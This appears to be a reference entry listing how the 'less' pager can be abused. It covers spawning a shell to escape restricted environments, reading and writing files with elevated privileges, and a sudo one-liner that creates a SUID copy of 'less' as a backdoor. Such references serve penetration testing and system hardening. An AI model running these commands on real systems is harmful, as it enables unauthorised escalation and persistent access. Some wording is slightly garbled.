It can be used to break out from restricted environments by spawning an interactive system shell.
less /etc/profile !/bin/sh
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile v
It writes data to files, it may be used to do privileged writes or write files outside a restricted file system.
echo DATA | less sfile_to_write q
This invokes the default editor to edit the file. The file must exist.
less file_to_write v
It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
This is useful when
less is used as a pager by another binary to read a different file.
less /etc/profile :e file_to_read
It runs with the SUID bit set and may be exploited to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor. If it is used to run
sh -p, omit the
-p argument on systems like Debian (<= Stretch) that allow the default
sh shell to run with SUID privileges.
sudo sh -c 'cp $(which less) .; chmod +s ./less' ./less file_to_read
It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on
sudo less /etc/profile !/bin/sh